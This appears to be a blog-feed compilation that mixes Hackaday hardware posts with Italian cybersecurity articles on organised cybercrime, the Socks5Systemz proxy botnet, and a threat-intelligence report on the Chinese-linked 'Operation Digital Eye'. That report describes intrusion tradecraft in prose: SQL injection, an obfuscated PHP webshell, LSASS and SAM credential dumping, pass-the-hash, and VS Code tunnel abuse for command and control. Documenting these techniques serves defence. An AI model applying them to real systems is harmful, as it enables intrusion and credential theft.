Le criptovalute, come Monero e Bitcoin, sono diventate uno dei principali mezzi di pagamento nel cybercrime. La loro diffusione ha contribuito in modo significativo al radicamento del crimine informatico e alla sua crescita costante, rendendo estremamente complessa l’attività investigativa condotta dalle forze dell’ordine.

La facilità di utilizzo di queste piattaforme criminali, l’assenza di barriere significative e l’uso di criptovalute, facili da scambiare e ripulire, hanno attirato l’attenzione delle principali organizzazioni mafiose e dei gruppi criminali organizzati.

Ho deciso di redigere questo report per fornire una panoramica dettagliata sullo stato attuale del cybercrime, analizzando come il crimine organizzato e le mafie sfruttino questo contesto per accrescere il proprio potere ed espandere le loro attività, sia a livello territoriale che virtuale.

Nella prima parte esamineremo l’ambiente underground del web, dove si svolgono molteplici attività illecite: dallo spaccio di farmaci e stupefacenti alla pedopornografia, fino alle truffe di vario tipo. Nella seconda parte, ci concentreremo sul fenomeno del Cyber Organized Crime (COC), analizzando i gruppi che hanno attirato maggiore attenzione da parte delle forze dell’ordine. Concluderemo esplorando come i social network rappresentino uno strumento potente per le mafie, consentendo loro di costruire consenso, soprattutto tra i più giovani.

Scarica il report “Dal Cybercrime al Cyber Organized Crime (COC)” di DarkLab

L'articolo DarkLab Report : Dal Cybercrime al Cyber Organized Crime (COC) proviene da il blog della sicurezza informatica.

Anyone who has operated a 3D printer before, especially those new to using these specialized tools, has likely had problems with the print bed. The bed might not always be the correct temperature leading to problems with adhesion of the print, it could be uncalibrated or dirty or cause any number of other issues that ultimately lead to a failed print. Most of us work these problems out through trial and error and eventually get settled in, but this novel 3D printer instead removes the bed itself and prints on whatever surface happens to be nearby.

The printer is the product of [Daniel Campos Zamora] at the University of Washington and is called MobiPrint. It uses a fairly standard, commercially available 3D printer head but attaches it to the base of a modified robotic vacuum cleaner. The vacuum cleaner is modified with open-source software that allows it to map its environment without the need for the manufacturer’s cloud services, which in turn lets the 3D printer print on whichever surface the robot finds in its travels. The goal isn’t necessarily to eliminate printer bed problems; a robot with this capability could have many more applications in the realm of accessibility or even, in the future, printing while on the move.

There were a few surprising discoveries along the way which were mentioned in an IEEE Spectrum article, as [Campos Zamora] found while testing various household surfaces that carpet is surprisingly good at adhering to these prints and almost can’t be unstuck from the prints made on it. There are a few other 3D printers out there that we’ve seen that are incredibly mobile, but none that allow interacting with their environment in quite this way.

youtube.com/embed/SknW-Oygh3w?…

hackaday.com/2024/12/10/3d-pri…

The RC car is controlled via an FPV setup. (Credit: Luke Bell, YouTube)
Fresh off a world record for the fastest quadcopter, [Luke Bell] decided to try his luck with something more own to earth, namely trying to tackle the world record for the fastest RC car, with the current record set at 360 km/h. Starting off with a first attempt in what will be a video series, the obvious approach seems to be to get some really powerful electric motors, a streamlined body and a disused runway to send said RC car hurtling along towards that golden medal. Of course, if it was that easy, others would have done it already.

With the quadcopter record of nearly 500 km/h which we covered previously, the challenge was in a way easier, as other than air resistance and accidental lithobraking there are no worries about ground texture, tire wear or boundary layer aerodynamics. In comparison, the RC car has to contend with all of these, with the runway’s rough tarmac surface being just one of the issues, along with making sure that the wheels would hold up to the required rotation speed. For the wheels you got options like foam, hard rubber, etc., all with their own advantages and disadvantages, mostly in terms of grip and reliability.

So far speeds of over 200 km/h are easy enough to do, with foam wheels being the preferred option. To push the RC car to 300 km/h and beyond, a lot more experimentation and trial runs will have to be performed. Pending are changes to the aerodynamic design with features also commonly seen in F1 race cars such as downforce spoilers, diffusers and other tricks which should prevent the RC car from (briefly) becoming an RC airplane.

youtube.com/embed/8sLmrpDYoLs?…

hackaday.com/2024/12/10/trying…

Hackaday’s Supercon is still warm in our hearts, and the snow is just now starting to fall, but we’re already looking forward to Spring. Or at least to Hackaday Europe, which will be taking place March 15th and 16th in Berlin, Germany.

Tickets aren’t on sale yet, but we know a way that you can get in for free.

Call for Participation

What makes Hackaday Europe special? Well, it’s you! We’re excited to announce that we’re opening up our call for talks right now, and we can’t wait to hear what you have to say. Speakers of course get in free, but the real reason that you want to present is whom you’re presenting to.

The Hackaday audience is interested, inquisitive, and friendly. If you have a tale of hardware, firmware, or software derring-do that would only really go over with a Hackaday crowd, this is your chance. We have slots open for shorter 20-minute talks as well as longer 40-minute ones, so whether you’ve got a quick hack or you want to take a deep dive, we’ve got you covered. We especially love to hear from new voices, so if you’ve never given a talk about your projects before, we’d really encourage you to apply!

Hackaday Europe, the Badge, and the SAOs

If you’re not familiar with Hackaday Europe, it’s a gathering of 350 folks for a ridiculously fun weekend of talks, badge hacking, music, and everything else that goes with it. Saturday the 15th is the big day, and Sunday is a half-day of brunch, lightning talks, and showing off the badge hacks from the day before. And if you’re in town on Friday the 14th, we’ll be going out in the evening for drinks and dinner, location TBA.

We’ll be re-spinning the 2024 Supercon SAO badge, which was all about the Supercon Add-Ons. (Can anyone think up a Hackaday-Europe-themed backronym: “Spree Add Ons”?) The badge was an inspiration for many stateside Supercon attendees to dip their toes into the warm waters of small badgelet designs, and we’re hoping to bring the same to the Continent. Additionally, there are two prototyping “petals” that you can hack on during the event, even if you didn’t make anything beforehand. And of course, there’s always hacking the firmware.

But wait, there’s more! We also ran a contest for pre-Supercon SAO designs, and the top three designs will be in your schwag bags at Hackaday Europe. Yes, this means that every attendee will be receiving a functional plug-in multimeter, etch-a-sketch, and blinky wavy-arm-art-thing. These are among the most creative and fun SAOs that we’ve ever seen, and now you too can have one!

See you There!

Again, tickets aren’t on sale yet, but we’re opening the green-room door to those who want to present first. Take the next few weeks to firm up an outline and get your talk proposal in to us before January 14th. We can’t wait to see what you’re up to!

hackaday.com/2024/12/10/2025-h…

If you’re a fan of the Fallout series of games, you’ve probably come across a Radiation King radio before. In the game, that is, they don’t exist in real life. Which is precisely why [zapwizard] built one!

Externally, the design faithfully recreates the mid-century design of the Radiation King. It’s got the louvered venting on the front panel, the chunky knobs, and a lovely analog needle dial, too. Inside, it’s got a Raspberry Pi Zero which is charged with running the show and dealing with audio playback. It’s paired with a Pi Pico, which handles other interface tasks.

It might seem simple, but the details are what really make this thing shine. It doesn’t just play music, it runs a series of simulated radio stations which you can “tune into” using the radio dial. [zapwizard dives into how it all works—from the air core motor behind the simulated tuning dial, to the mixing of music and simulated static. It’s really worth digging into if you like building retro-styled equipment that feels more like the real thing.

It’s not just a prop—it’s a fully-functional item from the Fallout universe, made manifest. You know how much we love those. If you’re cooking up your own post-apocalyptic hacks, fictional or non-fictional, don’t hesitate to let us know.

hackaday.com/2024/12/10/creati…

Having a penchant for cheap second-hand cameras can lead to all manner of interesting equipment. You never know what the next second-hand store will provide, and thus everything from good quality rangefinders an SLRs to handheld snapshot cameras can be yours for what is often a very acceptable price. Most old cameras can use modern film in some way, wither directly or through some manner of adapter, but there is one format that has no modern equivalent and for which refilling a cartridge might be difficult. I’m talking about Kodak’s Disc, the super-compact and convenient snapshot cameras which were their Next Big Thing in the early 1980s. In finding out its history and ultimate fate, I’m surprised to find that it introduced some photographic technologies we all still use today.

Easy Photography For The 1980s

Since their inception, Kodak specialised in easy-to-use consumer cameras and films. While almost all the film formats you can think of were created by the company, their quest was always for a super-convenient product which didn’t require any fiddling about to take photographs. By the 1960s this had given us all-in-one cartridge films and cameras such as the Instamatic series, but their enclosed rolls of conventional film made them bulkier than required. The new camera and film system for the 1980s would replace roll film entirely, replacing it with a disc of film that would be rotated between shots to line up the lens on an new unexposed part of its surface. Thus the film cartridge would be compact and thinner than any other, and the cameras could be smaller, thinner, and lighter too. The Disc format was launched in 1982, and the glossy TV adverts extolled both the svelteness of the cameras and the advanced technology they contained.
The Disc cartridge, with Fuji “HR” planar crystal film.
The film disc is about 65mm in diameter, with sixteen 10x8mm exposures spaced at every 24 degrees of rotation round its edge. It has a much thicker acetate backing than the more flexible roll film, with a set of sprocket-hole-like cutouts round its edge and a moulded plastic centre boss. The cassette is quite complex, having a protective low friction layer and a vacuum-formed lightproof film window cover and disc advancer inside the two injection moulded halves. Meanwhile the image size is significantly smaller than that of the 16mm 110 cartridge film or a 35mm frame, meaning that Disc films were the first to be released with Kodak’s new higher-resolution tabular grain emulsion. This film had the silver halide crystals aligned flat on the substrate, reducing light scattering.

Turning to the camera, for teardown purposes here we have a battered old Kodak 4000. This was the slightly fancier of the disc cameras at launch, but now they can easily be found for pennies in thrift stores. Opening it up is a case of gently easing the aluminum front panel away from the body, revealing all the internals. Once inside the camera, everything is automatic. On the left is the xenon flash tube, the flash capacitor, and a pair of Matsushita lithium batteries, in the middle the circuit board covered by a high voltage warning sticker, and on the right are the mechanical parts. If you teardown one of these for yourself, you’ll want to disconnect the battery as we did, and discharge that flash capacitor. Even four-decade-old lithium batteries can hold enough capacity to charge it, and at 200 volts it packs a punch.

A Lot Of Complexity For A Simple Product

This thing is a lot more complex than the 126 cameras it replaced.
Carefully unsoldering the connections and lifting the board from the camera, we find a mixture of through-hole and surface-mount parts. The flash circuit is conventional, a small single transistor inverter that’s responsible for the “Wheeee” sound you hear when cameras of that era are turned on. The rest of the circuit is interesting, because all the control and light metering circuitry is driven by an integrated circuit. Marked “ACP 152”, it has no makers mark other than stating it was manufactured in Malaysia, and all manner of online searches on the part number reveal nothing. If this camera had been made in 2002 it would certainly be a microcontroller, but in 1982 such a conclusion would be much less likely and would certainly have been central to their marketing if present. Looking at its support components I see no clock circuit or other likely microcontroller ancillaries, so my best guess is it’s an ASIC containing analogue and logic circuitry, forming part of a simple state machine along with the electromechanical cam arrangement in the mechanism.

On the right a small motor turns a wheel (the blue plastic part in the photographs) with that selection of cams that open the window in the film cartridge and cock the shutter, for which the release is electronic via a small electromagnet. One of the functions is to push up a pin which lifts part of the film window cover clear of its locking protrusion, allowing the film to be advanced and the window opened. The lens doesn’t look special but in fact it’s the part which has most relevance to some of the cameras you’ll use today, because it’s the first mass-produced aspherical plastic lens. To deliver as sharp an image as possible on the smaller negative they needed a lens which would minimise aberations, and given the compact size of the camera they couldn’t have a multi-element lens that poked out of the front. This was the solution, and it’s a technology that has had a massive effect on miniature cameras ever since.

Where They Pushed Convenience Too Far

Looking for the first time at the workings of a Disc camera then, it’s a beautiful piece of miniaturisation, but it’s undeniably a complex mechanism when compared to the Instamatic 126 cameras it replaced or the 35mm compact cameras which competed with it. The specialist electronics, the electronic shutter release, and all those mechanical parts are impressive, but there’s a lot in there for a consumer snapshot camera. In doing this teardown we start for the first time to gain an inkling of why the disc format never achieved the success Kodak evidently hoped for it, though it’s when we consider a typical Disc photo that the real reason for its failure emerges.
The size of the negative is especially obvious when looking at a developed film. D. Meyer, CC BY-SA 3.0.
The Disc’s tiny negative, when combined with the high-resolution film, gave a good quality image. But in those days when photographic prints were the medium through which people consumed their pictures, it was a this smaller negative which led to lower quality enlargements. To solve this problem Kodak sold a complete printing package to laboratories with an enlarger system specifically for Disc film, but many laboratories chose to use their existing equipment instead. The result was that the new cameras often generated disappointing-quality prints. By comparison a 35mm snapshot camera gave a much higher quality and had 36 pictures on a roll of film, so for all its sophistication and innovation the Disc format was not a success. By the 1990s the cameras were gone, and the film followed some time around the millennium. Kodak would try one last shot at ultimate film convenience in the mid 1990s with the Advanced Photo System, but by then the digital camera revolution was well under way.

Looking at the Disc camera here in 2024, it’s clearly a well designed item both mechanically and aesthetically. I have three of them on my bench, they still look sleek, and amazingly those four-decade-old lithium batteries still have enough power to run them. With hindsight it’s easy to say that its shortcomings should have been obvious, but I remember at the time they were seen as futuristic and the way forward. I didn’t buy one though, perhaps it says it all that they were way outside pocket-money prices. Maybe the real insight comes in using Disc to explain why Kodak are now a shadow of their former self; when the reason for extreme convenience in film photography was eclipsed by digital cameras they had nothing else to offer.

hackaday.com/2024/12/10/disc-f…

Negli ultimi anni, le botnet hanno rappresentato una delle minacce più insidiose e difficili da contrastare nel panorama della cybersicurezza. Tra queste, una delle più persistenti e sofisticate è senza dubbio Socks5Systemz, una botnet attiva sin dal 2013. Questa rete malevola alimenta un servizio proxy illegale noto come PROXY.AM, utilizzando dispositivi compromessi per fornire a criminali informatici una rete anonima con cui occultare le loro attività illecite.

Indagini attraverso la threat Intelligence permettono di comprendere meglio l’ampiezza di questa minaccia e i meccanismi alla base del suo funzionamento. Vediamo come questa botnet è strutturata, quali sono le sue implicazioni sulla sicurezza globale e perché rappresenta un rischio concreto e costante.

Cos’è una Botnet e Come Funziona Socks5Systemz

Una botnet è una rete di dispositivi infettati da malware e controllati da remoto da un attaccante, noto come botmaster. I dispositivi compromessi, spesso chiamati bot o zombie, possono includere computer, smartphone, router e persino dispositivi IoT. L’attaccante utilizza questa rete per svolgere attività malevole come inviare spam, lanciare attacchi DDoS o, come nel caso di Socks5Systemz, fornire servizi di proxy anonimi.

La botnet Socks5Systemz ha una caratteristica distintiva: trasforma i dispositivi infetti in nodi di uscita proxy. Ciò significa che il traffico internet dei cybercriminali può essere instradato attraverso questi dispositivi, rendendo estremamente difficile risalire alla vera origine degli attacchi. Questo tipo di infrastruttura è fondamentale per garantire l’anonimato degli attaccanti e rendere le loro attività quasi impossibili da tracciare.

Il Servizio Proxy Illegale PROXY.AM

La botnet Socks5Systemz supporta il funzionamento di un servizio proxy illegale noto come PROXY.AM. Secondo il rapporto di The Hacker News, questo servizio offre ai cybercriminali l’accesso a proxy privati e anonimi dietro pagamento di una quota mensile che varia tra 126 e 700 dollari. PROXY.AM pubblicizza i suoi servizi come:

• “Elite” proxy server, garantendo elevate prestazioni e anonimato.
• “Privati” e “anonimi”, assicurando che le connessioni siano sicure e non tracciabili.

I clienti di PROXY.AM possono utilizzare questi proxy per nascondere le proprie attività malevole, come campagne di phishing, furti di dati, frodi online e diffusione di malware.

Declino e Rinascita della Botnet

Dal 2013, la botnet ha subito diverse trasformazioni. Inizialmente, contava circa 250.000 dispositivi compromessi. Tuttavia, grazie alle azioni delle autorità e alla perdita parziale di controllo da parte dei suoi gestori, la rete si è ridotta. Attualmente, si stima che la botnet sia composta da circa 85.000 dispositivi infetti, che continuano a essere utilizzati come nodi di uscita per il servizio PROXY.AM. Questo declino è stato seguito da una fase di ricostruzione, dimostrando la resilienza e la capacità di adattamento dei botmaster.

Analisi della Struttura della Botnet

L’immagine allegata fornisce una chiara rappresentazione visiva delle interconnessioni tra i vari elementi della botnet. Vediamo alcuni punti salienti:

Nodo Centrale: Socks5Systemz

• Socks5Systemz è il fulcro della rete, il nodo principale da cui si diramano numerose connessioni.
• Questo nodo controlla e gestisce il traffico che viene instradato attraverso i dispositivi infetti.

Servizi Collegati

• PROXY.AM e proxyam.one sono servizi direttamente collegati a Socks5Systemz. Essi rappresentano l’infrastruttura utilizzata per vendere accessi proxy ai criminali informatici.
• Questi servizi sono indicati come fonti di traffico malevolo, offrendo connessioni anonime e private per attività illegali.

Paesi Colpiti

Dalla mappa della rete, è evidente che la botnet colpisce dispositivi in diverse parti del mondo. I paesi più colpiti includono:

• India
• Indonesia
• Ucraina
• Brasile
• Bangladesh
• Federazione Russa
• Messico
• Stati Uniti
• Nigeria

Questi paesi fungono da base per i dispositivi compromessi che vengono utilizzati come nodi proxy, permettendo al traffico malevolo di apparire come proveniente da queste aree.

Implicazioni per la Sicurezza Informatica

L’esistenza di una botnet come Socks5Systemz evidenzia diverse criticità e implicazioni per la sicurezza globale:

1. Difficoltà nel Tracciamento degli Attaccanti:
   Poiché gli attaccanti utilizzano dispositivi compromessi come nodi di uscita proxy, risalire alla loro identità diventa estremamente difficile. Questo complica le indagini e favorisce l’impunità dei cybercriminali.
2. Frode e Criminalità Organizzata:
   Servizi come PROXY.AM facilitano attività criminali su larga scala, inclusi attacchi di phishing, frodi finanziarie e campagne di spam. Il costo relativamente basso per l’accesso a questi servizi rende la criminalità informatica accessibile anche a individui con risorse limitate.
3. Rischi per le Vittime Inconsapevoli:
   I dispositivi compromessi spesso appartengono a utenti ignari. Questi dispositivi possono essere utilizzati per scopi malevoli senza che i proprietari se ne accorgano, esponendoli a potenziali conseguenze legali e compromettendo la loro privacy.
4. Minacce per le Aziende:
   Le aziende possono subire attacchi originati da queste reti proxy, mettendo a rischio dati sensibili, reputazione e stabilità operativa.

Come Proteggersi dalle Botnet

Per contrastare minacce come Socks5Systemz, è fondamentale adottare buone pratiche di sicurezza informatica:

• Mantenere sempre aggiornati i sistemi operativi e il software per ridurre le vulnerabilità sfruttabili dai malware.
• Utilizzare antivirus e soluzioni di sicurezza avanzate per rilevare e bloccare attività sospette.
• Monitorare il traffico di rete per individuare comportamenti anomali, come connessioni non autorizzate a server esterni.
• Eseguire backup regolari dei dati per mitigare i danni in caso di compromissione.
• Educare gli utenti sui rischi delle email di phishing e dei download non sicuri.

La botnet Socks5Systemz e il servizio proxy illegale PROXY.AM rappresentano una minaccia persistente e sofisticata per la sicurezza informatica globale. La capacità di questa rete di adattarsi e sopravvivere nel tempo dimostra quanto sia difficile contrastare efficacemente queste infrastrutture malevole. La collaborazione internazionale e l’adozione di misure preventive sono essenziali per mitigare l’impatto di queste minacce e proteggere utenti e aziende dagli attacchi dei cybercriminali.

L'articolo Socks5Systemz : 250.000 dispositivi nella botnet che fornisce proxy anonimi ai criminali proviene da il blog della sicurezza informatica.

Sintesi

• Da fine giugno a metà luglio 2024, un presunto autore di minacce con legami con la Cina ha preso di mira grandi fornitori di servizi IT B2B nell’Europa meridionale, un cluster di attività che abbiamo soprannominato “Operation Digital Eye”.
• Le intrusioni avrebbero potuto consentire agli avversari di stabilire punti di appoggio strategici e compromettere le entità a valle. SentinelLabs e Tinexta Cyber ​​hanno rilevato e interrotto le attività nelle loro fasi iniziali.
• Gli autori della minaccia hanno utilizzato una capacità di movimento laterale indicativa della presenza di un fornitore condiviso o di un quartiermastro digitale che si occupa della manutenzione e del provisioning degli strumenti all’interno dell’ecosistema APT cinese.
• Gli autori della minaccia hanno sfruttato in modo improprio Visual Studio Code e l’infrastruttura Microsoft Azure per scopi C2, tentando di eludere il rilevamento facendo apparire legittime le attività dannose.
• La nostra visibilità suggerisce che l’abuso di Visual Studio Code per scopi C2 era stato relativamente raro in natura prima di questa campagna. Operation Digital Eye segna il primo caso di un presunto gruppo APT cinese che utilizza questa tecnica che abbiamo osservato direttamente.

Panoramica

Tinexta Cyber ​​e SentinelLabs hanno monitorato le attività di minaccia che hanno preso di mira i provider di servizi IT business-to-business nell’Europa meridionale. Sulla base del malware, dell’infrastruttura, delle tecniche utilizzate, della vittimologia e della tempistica delle attività, è altamente probabile che questi attacchi siano stati condotti da un attore di minacce China-nexus con motivazioni di cyberspionaggio.

Le relazioni tra i paesi europei e la Cina sono complesse, caratterizzate da cooperazione, competizione e tensioni sottostanti in settori quali commercio, investimenti e tecnologia. I gruppi di cyberspionaggio sospetti legati alla Cina prendono spesso di mira organizzazioni pubbliche e private in tutta Europa per raccogliere informazioni strategiche, ottenere vantaggi competitivi e promuovere interessi geopolitici, economici e tecnologici.

La campagna di attacco, che è stata soprannominata Operation Digital Eye, si è svolta da fine giugno a metà luglio 2024, per una durata di circa tre settimane. Le organizzazioni prese di mira forniscono soluzioni per la gestione di dati, infrastrutture e sicurezza informatica per clienti di vari settori, il che le rende obiettivi primari per gli attori del cyberspionaggio.

Una presenza sostenuta all’interno di queste organizzazioni fornirebbe agli attori di Operation Digital Eye un punto d’appoggio strategico, creando opportunità di intrusioni nella supply chain digitale e consentendo loro di esercitare il controllo sui processi IT critici all’interno delle entità compromesse a valle. Gli attacchi sono stati rilevati e interrotti durante le loro fasi iniziali.

Il gruppo esatto dietro Operation Digital Eye rimane poco chiaro a causa dell’ampia condivisione di malware, manuali operativi e processi di gestione delle infrastrutture all’interno del panorama delle minacce cinesi. Gli autori delle minacce hanno utilizzato una capacità pass-the-hash, probabilmente proveniente dalla stessa fonte delle modifiche Mimikatz personalizzate closed-source osservate esclusivamente in presunte attività di cyberspionaggio cinese, come Operation Soft Cell e Operation Tainted Love. Il malware e gli strumenti utilizzati in queste campagne sono stati collegati a diversi gruppi APT cinesi distinti. Ci riferiamo collettivamente a queste modifiche Mimikatz personalizzate come mimCN.

L’evoluzione a lungo termine e il versioning dei campioni mimCN, insieme a caratteristiche notevoli come le istruzioni rilevate per un team separato di operatori, suggeriscono il coinvolgimento di un fornitore condiviso o di un quartier generale digitale responsabile della manutenzione attiva e della fornitura di strumenti. Questa funzione all’interno dell’ecosistema APT cinese, corroborata dalla fuga di notizie I-Soon, probabilmente svolge un ruolo chiave nel facilitare le operazioni di cyberspionaggio China-nexus.

L’abuso di Visual Studio Code Remote Tunnels per scopi C2 è centrale in questa campagna. Originariamente progettata per abilitare lo sviluppo remoto, questa tecnologia fornisce un accesso completo agli endpoint, inclusa l’esecuzione dei comandi e la manipolazione del file system. Inoltre, il tunneling di Visual Studio Code coinvolge eseguibili firmati da Microsoft e dall’infrastruttura di rete di Microsoft Azure, entrambi spesso non monitorati attentamente e in genere consentiti dai controlli delle applicazioni e dalle regole del firewall. Di conseguenza, questa tecnica potrebbe essere difficile da rilevare e potrebbe eludere le difese di sicurezza. In combinazione con l’accesso completo agli endpoint che fornisce, ciò rende il tunneling di Visual Studio Code una capacità attraente e potente da sfruttare per gli attori delle minacce.

Tinexta Cyber ​​e SentinelLabs hanno informato Microsoft dell’abuso di Visual Studio Code e dell’infrastruttura di Azure in relazione all’operazione Digital Eye.

Vettore di infezione e progressione dell’attacco

Gli aggressori hanno utilizzato l’iniezione di SQL (Structured Query Language) come vettore di accesso iniziale per infiltrarsi nei server Web e nei database connessi a Internet. Le intestazioni User-Agent delle richieste nei registri del traffico Web recuperate indicano che gli aggressori hanno utilizzato lo strumento sqlmap per automatizzare il rilevamento e lo sfruttamento delle vulnerabilità di iniezione di SQL.

Per stabilire un punto d’appoggio iniziale e mantenere un accesso persistente, gli autori della minaccia hanno distribuito una webshell basata su PHP. Relativamente semplice nella progettazione e nell’implementazione, la webshell utilizza la funzione assert per eseguire il codice PHP fornito dall’aggressore. La sua implementazione non assomiglia ad altre webshell con cui si ha familiarità. A questa webshell è stato dato il di PHPsert.

Per mascherare i file che implementano PHPsert e tentare di eludere il rilevamento in base all’attività del file system, gli aggressori hanno utilizzato nomi personalizzati su misura per gli ambienti infiltrati, facendo apparire legittimi i nomi dei file. Ciò includeva l’utilizzo della lingua locale e di termini allineati al contesto tecnologico delle organizzazioni prese di mira.

Dopo aver stabilito un punto d’appoggio iniziale, gli autori della minaccia hanno condotto una ricognizione utilizzando una varietà di strumenti di terze parti e utilità Windows integrate, come GetUserInfo e ping. Hanno anche distribuito lo strumento local.exe, che fa parte del Microsoft Windows NT Resource Kit e consente di visualizzare le appartenenze ai gruppi di utenti.

Per rubare le credenziali, gli aggressori hanno utilizzato lo strumento CreateDump per estrarre la memoria allocata al processo Local Security Authority Subsystem Service (LSASS) ed esfiltrare le credenziali. CreateDump fa parte della distribuzione di Microsoft .NET Framework. Gli autori della minaccia hanno anche recuperato le credenziali dal database Security Account Manager (SAM), che hanno estratto dal Registro di sistema di Windows utilizzando il comando reg save.

Gli attori della minaccia spesso nominano i file che distribuiscono utilizzando il pattern do.*. Esempi includono do.log (output dai comandi ping), do.exe (lo strumento CreateDump) e do.bat(uno script che esegue ed elimina l’eseguibile CreateDump).

Dagli endpoint inizialmente compromessi, gli aggressori si sono spostati lateralmente attraverso la rete interna, utilizzando principalmente connessioni RDP (Remote Desktop Protocol) e tecniche pass-the-hash. Per gli attacchi pass-the-hash, hanno utilizzato una versione modificata personalizzata di Mimikatz, implementata in un eseguibile denominato bK2o.exe.

Oltre alla webshell PHPsert, gli autori della minaccia hanno utilizzato due metodi per l’esecuzione di comandi remoti: l’accesso SSH, abilitato authorized_keys distribuendo file contenenti chiavi pubbliche per l’autenticazione, e Visual Studio Code Remote Tunnels.

Visual Studio Code Remote Tunnels, basato sulla tecnologia dev tunnel di Microsoft, consente agli sviluppatori di accedere e lavorare su sistemi remoti. Questo accesso include il terminale di comando e il file system, consentendo attività come l’esecuzione di comandi e la modifica di file. Gli attori di Operation Digital Eye hanno abusato di questa funzionalità per mantenere un accesso backdoor persistente ai sistemi compromessi.

Nel tentativo di eludere il rilevamento basato sull’attività del file system, gli autori della minaccia hanno utilizzato %System[url=https://www.redhotcyber.com/post/la-storia-della-superuser-la-storia-di-root]Root[/url]%\Temp e %ProgramData%\Visual Studio Code come directory di lavoro principali per l’archiviazione di strumenti e dati. %SystemRoot%\Temp è una directory in cui Windows archivia i file temporanei e spesso viene monitorata con minore attenzione. %ProgramData%\Visual Studio Code doveva apparire come una directory legittima associata a Visual Studio Code.

Le intrusioni sono state rilevate e interrotte prima che gli aggressori potessero procedere con fasi successive, come l’esfiltrazione dei dati.

Abuso di Visual Studio Code

Gli autori della minaccia hanno distribuito un eseguibile portatile di Visual Studio Code denominato code.exe, che è firmato digitalmente da Microsoft, e hanno utilizzato lo strumento winsw per eseguirlo come servizio Windows. Il file di configurazione winsw che è stato recuperato indica che gli aggressori hanno creato un servizio denominato Visual Studio Code Service, che viene eseguito code.exe con il parametro tunnel della riga di comando a ogni avvio del sistema.

Il file di configurazione rivela un approccio pragmatico da parte degli attori della minaccia, che hanno probabilmente modificato una configurazione disponibile al pubblico winsw. Ciò è suggerito dall’uso dell’identificativo myapp del servizio e della directory %BASE%\logs per l’archiviazione dei file winsw di registro, entrambi presenti nel file di configurazione pubblico e in quello recuperato.
file di configurazione winsw
Il parametro tunnel ordina a Visual Studio Code di creare un tunnel di sviluppo e di agire come server a cui gli utenti remoti possono connettersi. Dopo l’autenticazione al tunnel con un account Microsoft o GitHub, gli utenti remoti possono accedere all’endpoint che esegue il server di Visual Studio Code, tramite l’applicazione desktop di Visual Studio Code o la versione basata su browser, vscode.dev.

Dopo aver creato i tunnel di sviluppo, gli autori della minaccia si sono autenticati tramite account GitHub e hanno avuto accesso agli endpoint compromessi tramite la versione basata su browser di Visual Studio Code. Non si sa ancora se gli autori della minaccia abbiano utilizzato l’account GitHub auto registrato o compromesso per autenticarsi nei tunnel.

Infrastruttura di rete

Gli autori dell’Operazione Digital Eye hanno utilizzato infrastrutture situate esclusivamente in Europa, provenienti dal provider M247 e dalla piattaforma Cloud Microsoft Azure. Ciò faceva probabilmente parte di una strategia deliberata. Poiché le organizzazioni prese di mira hanno sede e operano in Europa, gli aggressori potrebbero aver cercato di ridurre al minimo i sospetti allineando la posizione della loro infrastruttura a quella dei loro obiettivi. Inoltre, l’infrastruttura Cloud comunemente utilizzata nei flussi di lavoro IT legittimi, come Microsoft Azure, spesso non è monitorata attentamente ed è frequentemente consentita tramite restrizioni firewall. Sfruttando l’infrastruttura Cloud pubblica per scopi dannosi, gli aggressori hanno fatto apparire legittimo il traffico, il che può essere difficile da rilevare e potrebbe eludere le difese di sicurezza.

Nelle fasi iniziali degli attacchi, gli autori della minaccia hanno utilizzato il server con indirizzo IP 146.70.161[.]78 per stabilire l’accesso iniziale rilevando e sfruttando le vulnerabilità di SQL injection, e il server con indirizzo IP 185.76.78[.]117 per gestire la webshell PHPsert. Entrambi gli indirizzi IP sono assegnati al provider di infrastrutture M247 e si trovano rispettivamente in Polonia e Italia.

Nelle fasi successive degli attacchi, gli autori della minaccia hanno utilizzato il server con indirizzo IP 4.232.170[.]137 per scopi C2 quando accedevano da remoto agli endpoint compromessi tramite il protocollo SSH. Questo server fa parte dell’infrastruttura Azure di Microsoft nella region del data center ( intervallo IP Azure :, tag di servizio 🙂 . Al momento non si hanno informazioni sul fatto che gli autori della minaccia abbiano utilizzato credenziali Azure auto-registrate o compromesse per accedere e gestire le risorse e 4.232.128[.]0/18 i servizi Azure learn.microsoft.com/en-us/azur…AzureCloud.italynorth.

L’abuso del tunneling di Visual Studio Code per scopi C2 si basa anche sull’infrastruttura di Microsoft Azure. La creazione e l’hosting di un tunnel di sviluppo richiedono la connessione a un server Microsoft Azure con un dominio di *.[clusterID].devtunnels.ms, dove [clusterID]corrisponde alla regione di Azure dell’endpoint che esegue il server di Visual Studio Code, come euw per West Europe. In Operation Digital Eye, la creazione di tunnel di sviluppo ha comportato l’instaurazione di connessioni al server con il dominio [REDACTED].euw.devtunnels[.]ms, che si è risolto nell’indirizzo IP 20.103.221[.]187. Questo server fa parte dell’infrastruttura di Microsoft Azure nella regione West Europe del data center (intervallo IP di Azure: 20.103.0[.]0/16, tag di servizio: AzureCloud.westeurope).

La Webshell PHPsert

PHPsert esegue il codice PHP fornito dall’attaccante utilizzando la funzione assert, che, nelle versioni PHP precedenti alla 8.0.0, interpreta ed esegue stringhe di parametri come codice PHP. Per ostacolare l’analisi statica ed eludere il rilevamento, la webshell utilizza varie tecniche di offuscamento del codice, tra cui la codifica XOR, la rappresentazione dei caratteri esadecimali, la concatenazione di stringhe e nomi di variabili randomizzati.
Implementazione PHPsert
La webshell PHPsert funziona come segue:

• PHPsert istanzia una classe con un singolo metodo regolare, che decodifica tramite XOR e concatena i caratteri esadecimali per generare la stringa assert. Il distruttore della classe (il metodo magico __destruct) usa questa stringa per invocare la funzione assert, passando il codice PHP fornito dall’attaccante come parametro.
• La webshell recupera il codice PHP fornito dall’attaccante da un parametro di richiesta HTTP POST, ad esempio, momomomo. Se il parametro id è presente nell’URL della richiesta, PHPsert decodifica il valore codificato in Base64 del parametro POST. Se il parametro id è assente, la webshell utilizza il valore raw del parametro.
• Infine, quando PHPsert termina l’esecuzione, viene richiamato il distruttore della classe, che a sua volta richiama la funzione assert per eseguire il codice PHP fornito dall’aggressore.

Abbiamo identificato diverse varianti di PHPsert, che sono state inviate a piattaforme di condivisione di malware da maggio 2023, da varie località tra cui Giappone, Singapore, Perù, Taiwan, Iran, Corea e Filippine. Queste varianti mostrano solo piccole differenze nella loro implementazione, come nomi di variabili e parametri di richiesta POST come mr6, brute, e qq. L’analisi suggerisce che PHPsert è distribuito non solo come file PHP autonomo, ma è anche integrato in vari tipi di contenuti Web, tra cui editor di testo Web e sistemi di gestione dei contenuti.

